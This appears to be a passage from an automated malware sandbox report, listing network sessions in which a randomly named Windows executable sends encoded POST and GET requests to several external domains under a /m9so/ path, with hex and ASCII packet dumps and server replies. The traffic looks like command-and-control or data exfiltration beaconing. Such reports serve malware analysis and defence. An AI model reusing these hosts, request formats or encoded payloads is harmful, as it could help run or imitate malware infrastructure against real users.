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
                                                                                    Mar 18, 2024 14:48:53.363591909 CET5144OUTData Raw: 76 46 66 44 73 78 67 66 4f 72 68 53 35 6e 43 52 56 46 46 39 4a 30 79 68 42 66 41 67 65 49 53 54 51 54 57 49 32 45 56 72 55 4d 77 6a 73 6c 34 44 6f 53 50 73 47 45 54 30 36 6c 6e 36 73 62 66 35 43 65 44 6f 64 31 2b 47 69 5a 4f 34 30 31 33 73 77 51
                                                                                    Data Ascii: vFfDsxgfOrhS5nCRVFF9J0yhBfAgeISTQTWI2EVrUMwjsl4DoSPsGET06ln6sbf5CeDod1+GiZO4013swQ8I/h3w5D2TOOuC3UrMWOhm91NNvusgKRgesZsQ69RYw54r2IwJCUzgok3QEOiYkP68974/L+M6CCoapBjKB7oKbh+l03V2/7Ek4dlKsP5AHKYm/bs+O/Drd9RHahOxb2ouU9LKs4GPwsErkVwSomFPPPeUUAPXEbm
                                                                                    Mar 18, 2024 14:48:53.536844969 CET1286OUTData Raw: 37 32 52 48 35 44 34 59 4e 32 69 49 38 74 65 33 73 37 6f 71 4e 52 6a 6f 4c 74 43 46 4f 4f 77 6d 47 72 69 7a 45 2f 65 54 2f 76 4f 67 79 4d 49 65 5a 6d 34 47 45 31 35 71 75 6a 79 53 36 53 6d 6f 7a 75 62 52 56 52 43 58 54 63 62 71 6a 4c 79 7a 37 65
                                                                                    Data Ascii: 72RH5D4YN2iI8te3s7oqNRjoLtCFOOwmGrizE/eT/vOgyMIeZm4GE15qujyS6SmozubRVRCXTcbqjLyz7eHhe44eYsHg9kcicJ4Sy+TrNoIvGUW5kqjEnEmIqagu/7EkX8M68oCG2AooziLoYwlH6tGpeqc2bxFd7sFq9RZIDcYZpLstDnlMDnSD9PFHLML2XX+YCItWx/rl02wbB3k15mW7lD9FvBi81Y39mBGSCbl4Yar4pge
                                                                                    Mar 18, 2024 14:48:53.536897898 CET6430OUTData Raw: 62 50 78 68 57 2b 78 36 4d 39 4f 49 57 4c 2f 57 35 76 53 55 2b 4f 33 4d 49 76 7a 5a 39 74 58 65 45 57 2f 52 52 6e 52 55 53 67 4c 61 52 49 75 67 71 78 58 77 35 62 6a 78 65 48 70 4b 65 37 41 78 67 4f 5a 6f 33 62 72 43 65 55 32 34 6f 2b 58 41 6d 79
                                                                                    Data Ascii: bPxhW+x6M9OIWL/W5vSU+O3MIvzZ9tXeEW/RRnRUSgLaRIugqxXw5bjxeHpKe7AxgOZo3brCeU24o+XAmyj1kKdJvz08XMX5ZgT4ArgsVbr8pBRMek1bRUZc6FJuwwSupYGvUz43/OOXse/TJ/91qLJUk8BXh++8vtiH2p2eA9pQ+SG6+lc8DGXiWYbe9E2cEDaxEIubTmPUY737JHaPFCDMx41Q8S7+NLurtTnMwGOQ7oMVX31
                                                                                    Mar 18, 2024 14:48:53.537117004 CET5144OUTData Raw: 45 36 65 73 2b 45 79 69 34 61 2b 59 2b 39 62 68 34 54 66 7a 73 6a 71 58 6f 4e 66 58 76 45 79 65 72 36 55 39 36 6c 55 79 52 31 32 6f 57 36 41 43 7a 4f 67 55 78 72 6e 59 4c 54 43 4d 6e 5a 77 66 69 31 48 45 67 39 35 2b 33 51 70 6e 42 39 2b 75 65 6e
                                                                                    Data Ascii: E6es+Eyi4a+Y+9bh4TfzsjqXoNfXvEyer6U96lUyR12oW6ACzOgUxrnYLTCMnZwfi1HEg95+3QpnB9+uenSO7rcBZPrxzogxwAdDUvYC9nREORx9eKjbr6v8V7+lsFSz2Jo1SWQS2UPhONwjqjo9cNZn/dZBhF4j747VUq/xO7lQuZC21HBHLP7vUk14PZcMrUSZ6hxJVdkGhqTQ9s9YCDZF8xSP+AJ8qe7gnPUcY/Gr/KHDqBc
                                                                                    Mar 18, 2024 14:48:53.537286043 CET10288OUTData Raw: 39 34 39 7a 66 56 6f 4b 49 54 54 36 70 33 30 64 67 67 36 69 34 46 42 31 35 5a 37 6a 72 30 41 4f 59 6e 6e 50 56 56 6e 67 49 73 34 46 5a 65 76 33 53 76 45 67 42 67 71 73 76 6f 74 59 4d 62 38 69 6e 2b 65 6c 56 7a 50 4c 71 6d 31 6a 39 41 4f 6c 41 44
                                                                                    Data Ascii: 949zfVoKITT6p30dgg6i4FB15Z7jr0AOYnnPVVngIs4FZev3SvEgBgqsvotYMb8in+elVzPLqm1j9AOlADGAF863Z+6npV1bfoI3iSdhNC+55yWf/JHCN74ev3RrE3IXip8pPKhZxxmdBXGDL3Wh/h8mO6Cr98OQKTVBB4tka7czU8AKjaGH4HekAjKGtT+1SOh5xKqZeiBjFBcN1rrzmJzvkMtRH41TpMkcwIiOapO0lH7zH3F
                                                                                    Mar 18, 2024 14:48:53.537452936 CET2572OUTData Raw: 46 42 4c 56 65 6e 76 74 66 69 34 69 38 39 37 72 65 72 2b 6b 72 6e 6a 4d 5a 67 64 51 4a 49 59 4c 33 32 55 66 2b 6a 78 68 36 33 65 66 34 7a 35 31 6c 51 2b 6e 75 52 7a 70 65 35 6a 37 70 51 68 64 32 69 53 31 45 2f 59 47 64 67 51 38 4a 66 4d 75 4d 5a
                                                                                    Data Ascii: FBLVenvtfi4i897rer+krnjMZgdQJIYL32Uf+jxh63ef4z51lQ+nuRzpe5j7pQhd2iS1E/YGdgQ8JfMuMZS7KDdxiopqKUCdkfBQDZ/UZnRhz0EFT1Ks6eE8fweuMh+dlsF+oV5nmKg2DR+y3G9ER8oqHgxUcpSwtcLnkjmmJo69nS95BIo8stb56pDAHAnxsFT/Cp1rhCG5dCuu54JPza109wx813REt78cZU3iNbxX8aH+aYl
                                                                                    Mar 18, 2024 14:48:53.712086916 CET1286OUTData Raw: 4f 74 33 41 52 45 4d 7a 6d 6c 66 7a 78 45 57 44 61 51 61 44 6f 7a 47 35 6d 76 4b 51 66 41 70 68 53 72 48 6f 52 77 38 2f 6f 4f 76 35 7a 4e 47 70 35 2f 52 62 2f 46 42 63 6c 71 41 45 39 63 4f 6f 7a 79 34 65 56 64 35 46 31 74 55 77 74 56 50 4f 4e 59
                                                                                    Data Ascii: Ot3AREMzmlfzxEWDaQaDozG5mvKQfAphSrHoRw8/oOv5zNGp5/Rb/FBclqAE9cOozy4eVd5F1tUwtVPONY5r4RgODBTwWv9UDb+Wt9FGAH1k7KBRpDGTqWj7WkczJiwMSyLk7dgGxcuzs59bz2uP/KhlayJ7oYrbHn5uzEbInBpuoLvr9jL/WgO/OXjC3DEAHMI23LOF+2Ny1mulqOwRpnzK+yH6xCchT3wdAOBvsGs/8Dl2ksR
                                                                                    Mar 18, 2024 14:48:53.712099075 CET3858OUTData Raw: 48 30 58 32 47 61 4a 46 31 79 4e 68 69 33 6f 5a 41 4f 6e 52 75 43 66 74 75 7a 43 77 53 38 31 56 4a 2f 47 6c 4c 67 72 62 63 74 78 6a 48 6a 74 55 4e 51 67 31 6e 61 2b 57 77 39 6c 38 70 33 4d 41 2b 63 66 59 43 4d 4e 76 66 45 63 35 38 45 2b 74 46 66
                                                                                    Data Ascii: H0X2GaJF1yNhi3oZAOnRuCftuzCwS81VJ/GlLgrbctxjHjtUNQg1na+Ww9l8p3MA+cfYCMNvfEc58E+tFfCZwq/dRN29QBjgqpiteRcU2kUp0yL2NqPFdDKYkgvi4lDYP4x+VHcqS10br3FUKYhyhq7tbucd344f3DYhwlTsRc/vREk0ZzZXxQ9AqJxzY15B4k5riw9nqp1uZrblAHQ0Wo8FmLEh1grk0wrF5b6Vyjf1q8Cc04q
                                                                                    Mar 18, 2024 14:48:53.712317944 CET2572OUTData Raw: 63 51 6a 68 47 57 35 4c 30 69 68 6f 30 71 32 48 56 4c 43 48 55 53 4c 53 2b 4c 36 4c 63 6d 74 39 35 34 4c 4b 52 70 78 61 61 56 78 33 4f 75 6a 6e 42 4a 65 45 31 52 66 36 30 30 79 2b 47 51 61 4e 66 30 4d 64 6e 6c 76 62 6d 51 46 74 30 34 58 53 78 2b
                                                                                    Data Ascii: cQjhGW5L0iho0q2HVLCHUSLS+L6Lcmt954LKRpxaaVx3OujnBJeE1Rf600y+GQaNf0MdnlvbmQFt04XSx+HB8B4TS6e/6bSlx8YJYmPpdGQlLl05LA/OL6xxWT4NDXkdsBk4OUSrTucHxXlMsJ58kqRKhQGUTnc6kim88XDQQBIrFU4n3d4Q7DavvChlTNTA8R53EzANa8fLJJTzoKq8yApjOX5HCjeReN7y7a6vkvvA6Kc64I4
                                                                                    Mar 18, 2024 14:48:53.712488890 CET5144OUTData Raw: 53 67 52 4a 55 52 58 59 7a 6e 6b 48 66 6f 46 46 65 4f 34 79 58 37 52 39 75 30 50 4a 4e 63 4f 71 73 64 57 33 34 55 67 5a 62 47 79 6f 66 33 6f 50 73 6f 33 32 33 54 69 53 65 71 39 2f 34 58 57 33 57 33 45 57 64 61 59 38 50 53 48 43 73 39 78 44 2f 30
                                                                                    Data Ascii: SgRJURXYznkHfoFFeO4yX7R9u0PJNcOqsdW34UgZbGyof3oPso323TiSeq9/4XW3W3EWdaY8PSHCs9xD/06GWTz+5PVqADILHI6btIbJnTp98qXjM0v4gjGxh8XCMOSCp9Xlvu6U3HPq2zbJhDmp6DphBmAcZxGy3Nco2rvCBMOEw8aJv27LfgeOQtvhr37CctTozlDt7jqRVdCZk41sXBEEiBctxXNrQyLHN+SDusDhfR9vTZ0
                                                                                    Mar 18, 2024 14:48:54.022317886 CET169INHTTP/1.0 500 Internal Server Error
                                                                                    Date: Mon, 18 Mar 2024 13:48:53 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.11.2049786198.177.123.106807756C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 14:48:56.063123941 CET537OUTGET /m9so/?LFPxWlV=tjvw02avMThAA8QJc7LpbKc0nVcyZYwiX1IZCpHHMcL/Cok/Fa8Xeiv0sI0YHyzKdXCYczJiWU6WICcQRxIhuBT/mPwaKCG7CcvbddJeMhWanndbuRu1+zE=&OBLTJ=U4yhXH6x-jhX HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Host: www.alpinebretech.life
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Mar 18, 2024 14:48:56.349569082 CET548INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 18 Mar 2024 13:48:56 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.11.204978746.30.215.63807756C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 14:49:01.784764051 CET796OUTPOST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.manupaint.com
                                                                                    Origin: http://www.manupaint.com
                                                                                    Referer: http://www.manupaint.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 204
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Data Raw: 4c 46 50 78 57 6c 56 3d 72 34 38 53 73 58 34 54 71 5a 75 47 78 6c 45 78 75 52 66 56 72 58 7a 33 75 54 2f 37 37 64 32 74 4c 45 71 50 66 47 4d 76 46 2b 57 31 70 4d 48 37 68 31 36 58 56 2b 49 37 4a 5a 77 68 58 6c 39 65 4c 36 34 55 43 53 54 51 78 46 39 78 6c 38 37 62 59 47 71 67 52 57 4f 33 73 50 5a 68 46 76 63 6d 52 54 52 77 78 43 6d 39 62 34 54 44 4b 62 6e 31 65 57 74 37 76 5a 42 7a 73 45 70 38 76 64 54 58 75 57 4a 2f 4d 64 58 66 65 57 36 4b 55 62 78 56 2b 7a 46 33 37 45 36 54 56 4c 7a 44 53 62 6a 58 6c 48 47 63 68 7a 58 49 2f 71 39 71 67 6d 66 6f 56 67 38 33 69 66 67 4e 57 4e 50 73 44 67 78 4d 74 67 3d 3d
                                                                                    Data Ascii: LFPxWlV=r48SsX4TqZuGxlExuRfVrXz3uT/77d2tLEqPfGMvF+W1pMH7h16XV+I7JZwhXl9eL64UCSTQxF9xl87bYGqgRWO3sPZhFvcmRTRwxCm9b4TDKbn1eWt7vZBzsEp8vdTXuWJ/MdXfeW6KUbxV+zF37E6TVLzDSbjXlHGchzXI/q9qgmfoVg83ifgNWNPsDgxMtg==
                                                                                    Mar 18, 2024 14:49:01.965683937 CET805INHTTP/1.1 200 OK
                                                                                    Cache-Control: max-age:600, public
                                                                                    Content-Length: 454
                                                                                    Expires: Mon, 18 Mar 2024 13:59:01 GMT
                                                                                    Last-Modified: Mon, 18 Mar 2024 13:49:01 GMT
                                                                                    Date: Mon, 18 Mar 2024 13:49:01 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    X-Onecom-Cluster-Name:
                                                                                    X-Varnish: 56032461030
                                                                                    Age: 0
                                                                                    Via: 1.1 webcache2 (Varnish/trunk)
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 22 77 77 77 2e 6d 61 6e 75 70 61 69 6e 74 2e 63 6f 6d 22 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 30 3b 0a 09 70 61 64 64 69 6e 67 3a 30 3b 0a 7d 0a 69 66 72 61 6d 65 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 09 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0a 09 77 69 64 74 68 3a 20 31 30 30 76 77 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 69 66 72 61 6d 65 20 73 72 63 3d 20 22 68 74 74 70 73 3a 2f 2f 70 69 6e 74 75 72 61 2e 6d 79 70 72 65 73 74 61 2e 73 68 6f 70 2f 6d 39 73 6f 2f 22 3e 3c 70 3e 59 6f 75 72 20 75 73 65 72 20 61 67 65 6e 74 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 73 2e 20 48 6f 77 65 76 65 72 20 79 6f 75 20 6d 61 79 20 76 69 73 69 74 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 6e 74 75 72 61 2e 6d 79 70 72 65 73 74 61 2e 73 68 6f 70 2f 6d 39 73 6f 2f 22 3e 74 68 65 20 70 61 67 65 20 74 68 61 74 20 77 61 73 20 73 75 70 70 6f 73 65 64 20 74 6f 20 62 65 20 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 69 66 72 61 6d 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE html><html><head><title>"www.manupaint.com"</title><style type="text/css">body {margin:0;padding:0;}iframe {display: block;border: none;height: 100vh;width: 100vw;}</style></head><body><iframe src= "https://pintura.mypresta.shop/m9so/"><p>Your user agent does not support iframes. However you may visit <a href="https://pintura.mypresta.shop/m9so/">the page that was supposed to be here</a></p></iframe></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.11.204978846.30.215.63807756C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 14:49:04.487514973 CET1136OUTPOST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.manupaint.com
                                                                                    Origin: http://www.manupaint.com
                                                                                    Referer: http://www.manupaint.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 544
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Data Raw: 4c 46 50 78 57 6c 56 3d 72 34 38 53 73 58 34 54 71 5a 75 47 77 46 30 78 73 33 58 56 6a 58 7a 32 68 7a 2f 37 69 74 32 70 4c 45 57 50 66 43 30 2f 46 4e 69 31 73 64 58 37 67 30 36 58 62 65 49 37 47 35 77 6b 49 56 39 42 4c 36 30 36 43 53 2f 51 78 46 70 78 6b 4a 76 62 5a 32 71 76 66 32 4f 32 37 2f 5a 6b 58 66 63 57 52 54 4e 57 78 48 47 39 62 72 58 44 4c 61 4c 31 61 48 74 30 2b 4a 42 31 6b 6b 70 39 30 4e 54 5a 75 57 46 64 4d 63 76 70 65 67 4b 4b 55 36 52 56 35 7a 46 6f 69 6b 36 71 4b 62 79 32 53 35 79 49 71 32 71 32 6c 67 7a 7a 6c 62 6b 53 69 47 6e 46 63 43 41 5a 35 74 67 33 65 2b 4b 4f 4f 68 38 68 31 6d 30 6d 4a 72 50 31 54 58 5a 41 4e 45 6d 6c 65 68 4f 75 54 35 68 38 76 63 34 46 56 6b 4e 37 55 4d 67 69 70 66 45 33 58 77 4f 69 5a 42 63 73 65 37 63 62 33 74 50 4c 37 4d 79 76 79 79 54 55 6b 42 6f 67 69 51 76 39 72 4e 59 6f 66 4c 4a 48 74 59 50 72 78 6c 4d 52 67 39 5a 70 4f 39 4e 7a 50 6d 6a 45 38 78 30 76 51 49 75 6c 45 37 6a 37 35 63 32 5a 2f 52 6c 37 72 61 36 66 79 4b 4b 35 42 79 36 4e 31 62 62 73 67 73 49 55 55 30 31 70 4c 54 6f 4d 6e 34 69 4b 39 51 59 2b 50 30 71 62 63 64 51 4c 59 4b 42 4c 4a 31 47 6e 55 30 42 6f 54 53 32 67 50 6a 4a 32 51 33 51 51 4b 7a 51 4d 57 66 41 4a 49 67 4d 59 58 79 49 38 55 66 43 32 48 6e 34 54 58 69 78 2b 6b 45 69 56 31 36 72 53 52 78 65 68 44 37 79 6d 79 6e 56 6b 35 48 6a 34 79 30 54 58 6c 48 65 68 48 7a 72 7a 55 68 65 53 6c 35 45 57 37 74 71 31 35 70 55 59 77 42 65 67 53 4b 47 77 42 4c 77 7a 32 4b 41 7a 65 57 6a 58 4a 59 66 33 66 48 76 70 37 47 68 79 42 72 38 6a 6c 55 61 77 61 42 2f 44 34 2b 37 54 38 6a 78 31 68 41 47 38 56 6c 51 69 6d 5a 43 78 62 70 39 52 74 65 33 52 4d 78 34 3d
                                                                                    Data Ascii: LFPxWlV=r48SsX4TqZuGwF0xs3XVjXz2hz/7it2pLEWPfC0/FNi1sdX7g06XbeI7G5wkIV9BL606CS/QxFpxkJvbZ2qvf2O27/ZkXfcWRTNWxHG9brXDLaL1aHt0+JB1kkp90NTZuWFdMcvpegKKU6RV5zFoik6qKby2S5yIq2q2lgzzlbkSiGnFcCAZ5tg3e+KOOh8h1m0mJrP1TXZANEmlehOuT5h8vc4FVkN7UMgipfE3XwOiZBcse7cb3tPL7MyvyyTUkBogiQv9rNYofLJHtYPrxlMRg9ZpO9NzPmjE8x0vQIulE7j75c2Z/Rl7ra6fyKK5By6N1bbsgsIUU01pLToMn4iK9QY+P0qbcdQLYKBLJ1GnU0BoTS2gPjJ2Q3QQKzQMWfAJIgMYXyI8UfC2Hn4TXix+kEiV16rSRxehD7ymynVk5Hj4y0TXlHehHzrzUheSl5EW7tq15pUYwBegSKGwBLwz2KAzeWjXJYf3fHvp7GhyBr8jlUawaB/D4+7T8jx1hAG8VlQimZCxbp9Rte3RMx4=
                                                                                    Mar 18, 2024 14:49:04.667092085 CET805INHTTP/1.1 200 OK
                                                                                    Cache-Control: max-age:600, public
                                                                                    Content-Length: 454
                                                                                    Expires: Mon, 18 Mar 2024 13:59:04 GMT
                                                                                    Last-Modified: Mon, 18 Mar 2024 13:49:04 GMT
                                                                                    Date: Mon, 18 Mar 2024 13:49:04 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    X-Onecom-Cluster-Name:
                                                                                    X-Varnish: 56049500387
                                                                                    Age: 0
                                                                                    Via: 1.1 webcache2 (Varnish/trunk)
                                                                                    Connection: close
